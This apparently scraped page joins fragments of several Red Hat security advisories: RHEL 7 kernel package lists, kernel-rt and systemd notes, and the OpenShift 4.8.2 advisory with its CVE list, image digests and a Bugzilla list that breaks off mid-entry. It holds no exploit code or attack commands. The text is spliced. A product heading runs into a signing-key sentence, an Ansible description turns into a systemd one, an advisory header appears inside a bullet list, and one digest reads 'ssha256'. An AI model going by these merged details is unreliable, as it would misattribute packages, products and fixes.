x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.36.2.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm perf-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.36.2.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm perf-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.36.2.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm kernel-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-headers-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm perf-3.10.0-1160.36.2.el7.s390x.rpm perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm python-perf-3.10.0-1160.36.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. These packages include redhat-release-virtualization-host. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Bug Fix(es):

  • xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count (BZ#1949916)

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Ansible is a SSH-based configuration management, deployment, and task execution system. The openshift-ansible packages contain Ansible code and playbooks for installing and upgrading OpenShift Container Platform 3. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.

Bug Fix(es):

  • kernel-rt: update RT source tree to the RHEL-8.3.z source tree (BZ#1957359)

  • Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.8.2 bug fix and security update Advisory ID: RHSA-2021:2438-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:2438 Issue date: 2021-07-27 CVE Names: CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 CVE-2021-33909 =====================================================================

  1. Summary:

Red Hat OpenShift Container Platform release 4.8.2 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.8.2. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2021:2437

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel ease-notes.html

Security Fix(es):

  • SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) (CVE-2016-2183)

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

  • nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)

  • etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)

  • etcd: DoS in wal/wal.go (CVE-2020-15112)

  • etcd: directories created via os.MkdirAll are not checked for permissions (CVE-2020-15113)

  • etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS (CVE-2020-15114)

  • etcd: no authentication is performed against endpoints provided in the

  • --endpoints flag (CVE-2020-15136)

  • jwt-go: access restriction bypass vulnerability (CVE-2020-26160)

  • nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)

  • nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)

  • golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)

  • golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)

  • containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206)

  • containers/storage: DoS via malicious image (CVE-2021-20291)

  • prometheus: open redirect under the /new endpoint (CVE-2021-29622)

  • golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)

  • go.elastic.co/apm: leaks sensitive HTTP headers during panic (CVE-2021-22133)

Space precludes listing in detail the following additional CVEs fixes: (CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382), (CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and (CVE-2021-23368)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-x86_64

The image digest is ssha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-s390x

The image digest is sha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le

The image digest is sha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f

All OpenShift Container Platform 4.8 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor

  1. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster - -cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1725981 - oc explain does not work well with full resource.group names 1747270 - [osp] Machine with name "-worker"couldn't join the cluster 1772993 - rbd block devices attached to a host are visible in unprivileged container pods 1786273 - [4.6] KAS pod logs show "error building openapi models ... has invalid property: anyOf" for CRDs 1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts 1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header 1812212 - ArgoCD example application cannot be downloaded from github 1817954 - [ovirt] Workers nodes are not numbered sequentially 1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole 1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server" 1825417 - The containerruntimecontroller doesn't roll back to CR-1 if we delete CR-2 1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades 1835264 - Intree provisioner doesn't respect PVC.spec.dataSource sometimes 1839101 - Some sidebar links in developer perspective don't follow same project 1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes 1846875 - Network setup test high failure rate 1848151 - Console continues to poll the ClusterVersion resource when the user doesn't have authority 1850060 - After upgrading to 3.11.219 timeouts are appearing. 1852637 - Kubelet sets incorrect image names in node status images section 1852743 - Node list CPU column only show usage 1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values 1857008 - [Edge] [BareMetal] Not provided STATE value for machines 1857477 - Bad helptext for storagecluster creation 1859382 - check-endpoints panics on graceful shutdown 1862084 - Inconsistency of time formats in the OpenShift web-console 1864116 - Cloud credential operator scrolls warnings about unsupported platform 1866222 - Should output all options when runing operator-sdk init --help 1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard 1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert 1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions 1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host 1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions 1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go 1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS 1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag 1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method 1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics 1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly 1872659 - ClusterAutoscaler doesn't scale down when a node is not needed anymore 1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack 1873649 - proxy.config.openshift.io should validate user inputs 1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials 1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable 1876918 - scheduler test leaves taint behind 1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1 1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable 1878685 - Ingress resource with "Passthrough" annotation does not get applied when using the newer "networking.k8s.io/v1" API 1879077 - Nodes tainted after configuring additional host iface 1879140 - console auth errors not understandable by customers 1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens 1879184 - CVO must detect or log resource hotloops 1879495 - [4.6] namespace \“openshift-user-workload-monitoring\” does not exist” 1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1879944 - [OCP 4.8] Slow PV creation with vsphere 1880757 - AWS: master not removed from LB/target group when machine deleted 1880758 - Component descriptions in cloud console have bad description (Managed by Terraform) 1881210 - nodePort for router-default metrics with NodePortService does not exist 1881481 - CVO hotloops on some service manifests 1881484 - CVO hotloops on deployment manifests 1881514 - CVO hotloops on imagestreams from cluster-samples-operator 1881520 - CVO hotloops on (some) clusterrolebindings 1881522 - CVO hotloops on clusterserviceversions packageserver 1881662 - Error getting volume limit for plugin kubernetes.io/ in kubelet logs 1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io 1881938 - migrator deployment doesn't tolerate masters 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883587 - No option for user to select volumeMode 1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine 1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster 1884800 - Failed to set up mount unit: Invalid argument 1885186 - Removing ssh keys MC does not remove the key from authorized_keys 1885349 - [IPI Baremetal] Proxy Information Not passed to metal3 1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses 1886572 - auth: error contacting auth provider when extra ingress (not default) goes down 1887849 - When creating new storage class failure_domain is missing. 1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs 1889689 - AggregatedAPIErrors alert may never fire 1890678 - Cypress: Fix 'structure' accesibility violations 1890828 - Intermittent prune job failures causing operator degradation 1891124 - CP Conformance: CRD spec and status failures 1891301 - Deleting bmh by "oc delete bmh' get stuck 1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass 1891766 - [LSO] Min-Max filter's from OCS wizard accepts Negative values and that cause PV not getting created 1892642 - oauth-server password metrics do not appear in UI after initial OCP installation 1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version 1893850 - Add an alert for requests rejected by the apiserver 1893999 - can't login ocp cluster with oc 4.7 client without the username 1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion 1895053 - Allow builds to optionally mount in cluster trust stores 1896226 - recycler-pod template should not be in kubelet static manifests directory 1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name 1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install 1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout 1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1899057 - fix spurious br-ex MAC address error log 1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay 1899587 - [External] RGW usage metrics shown on Object Service Dashboard is incorrect 1900454 - Enable host-based disk encryption on Azure platform 1900819 - Scaled ingress replicas following sharded pattern don't balance evenly across multi-AZ 1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed 1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API 1901648 - "do you need to set up custom dns" tooltip inaccurate 1902003 - Jobs Completions column is not sorting when there are "0 of 1" and "1 of 1" in the list. 1902076 - image registry operator should monitor status of its routes 1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given 1903228 - Pod stuck in Terminating, runc init process frozen 1903383 - Latest RHCOS 47.83. builds failing to install: mount /root.squashfs failed 1903553 - systemd container renders node NotReady after deleting it 1903700 - metal3 Deployment doesn't have unique Pod selector 1904006 - The --dir option doest not work for command oc image extract 1904505 - Excessive Memory Use in Builds 1904507 - vsphere-problem-detector: implement missing metrics 1904558 - Random init-p error when trying to start pod 1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests 1905147 - ConsoleQuickStart Card's prerequisites is a combined text instead of a list 1905159 - Installation on previous unused dasd fails after formatting 1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory 1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails 1905577 - Control plane machines not adopted when provisioning network is disabled 1905627 - Warn users when using an unsupported browser such as IE 1905709 - Machine API deletion does not properly handle stopped instances on AWS or GCP 1905849 - Default volumesnapshotclass should be created when creating default storageclass 1906056 - Bundles skipped via the skips field cannot be pinned 1906102 - CBO produces standard metrics 1906147 - ironic-rhcos-downloader should not use --insecure 1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart 1906740 - [aws]Machine should be "Failed" when creating a machine with invalid region 1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage 1907315 - the internal load balancer annotation for AWS should use "true" instead of "0.0.0.0/0" as value 1907353 - [4.8] OVS daemonset is wasting resources even though it doesn't do anything 1907614 - Update kubernetes deps to 1.20 1908068 - Enable DownwardAPIHugePages feature gate 1908169 - The example of Import URL is "Fedora cloud image list" for all templates. 1908170 - sriov network resource injector: Hugepage injection doesn't work with mult container 1908343 - Input labels in Manage columns modal should be clickable 1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures 1908655 - "Evaluating rule failed" for "record: node:node_num_cpu:sum" rule 1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes 1908765 - [SCALE] enable OVN lflow data path groups 1908774 - [SCALE] enable OVN DB memory trimming on compaction 1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it 1909091 - Pod/node/ip/template isn't showing when vm is running 1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error 1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing 1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade 1910067 - UPI: openstacksdk fails on "server group list" 1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing 1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn't match node selector: AWS compute machines without status 1910378 - socket timeouts for webservice communication between pods 1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling 1910500 - Could not list CSI provisioner on web when create storage class on GCP platform 1911211 - Should show the cert-recovery-controller version correctly 1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames 1912571 - libvirt: Support setting dnsmasq options through the install config 1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1913112 - BMC details should be optional for unmanaged hosts 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag 1913341 - GCP: strange cluster behavior in CI run 1913399 - switch to v1beta1 for the priority and fairness APIs 1913525 - Panic in OLM packageserver when invoking webhook authorization endpoint 1913532 - After a 4.6 to 4.7 upgrade, a node went unready 1913974 - snapshot test periodically failing with "can't open '/mnt/test/data': No such file or directory" 1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs 1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root 1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20 1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names 1915693 - Not able to install gpu-operator on cpumanager enabled node. 1915971 - Role and Role Binding breadcrumbs do not work as expected 1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page 1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1916392 - scrape priority and fairness endpoints for must-gather 1916450 - Alertmanager: add title and text fields to Adv. config. section of Slack Receiver form 1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with "Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready" 1916553 - Default template's description is empty on details tab 1916593 - Destroy cluster sometimes stuck in a loop 1916872 - need ability to reconcile exgw annotations on pod add 1916890 - [OCP 4.7] api or api-int not available during installation 1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. 1917282 - [Migration] MCO stucked for rhel worker after enable the migration prepare state 1917328 - It should default to current namespace when create vm from template action on details page 1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with "cannot go from state 'deploy failed' to state 'manageable'" 1917485 - [oVirt] ovirt machine/machineset object has missing some field validations 1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. 1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library 1918101 - [vsphere]Delete Provisioning machine took about 12 minutes 1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass 1918442 - Service Reject ACL does not work on dualstack 1918723 - installer fails to write boot record on 4k scsi lun on s390x 1918729 - Add hide/reveal button for the token field in the KMS configuration page 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1918785 - Pod request and limit calculations in console are incorrect 1918910 - Scale from zero annotations should not requeue if instance type missing 1919032 - oc image extract - will not extract files from image rootdir - "error: unexpected directory from mapping tests.test" 1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0 1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure dnsZone 1919168 - oc adm catalog mirror doesn't work for the air-gapped cluster 1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize 1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster 1919356 - Add missing profile annotation in cluster-update-keys manifests 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic 1919406 - OperatorHub filter heading "Provider Type" should be "Source" 1919737 - hostname lookup delays when master node down 1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade 1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests 1920300 - cri-o does not support configuration of stream idle time 1920307 - "VM not running" should be "Guest agent required" on vm details page in dev console 1920532 - Problem in trying to connect through the service to a member that is the same as the caller. 1920677 - Various missingKey errors in the devconsole namespace 1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources 1920901 - [4.7]"500 Internal Error" for prometheus route in https_proxy cluster 1920903 - oc 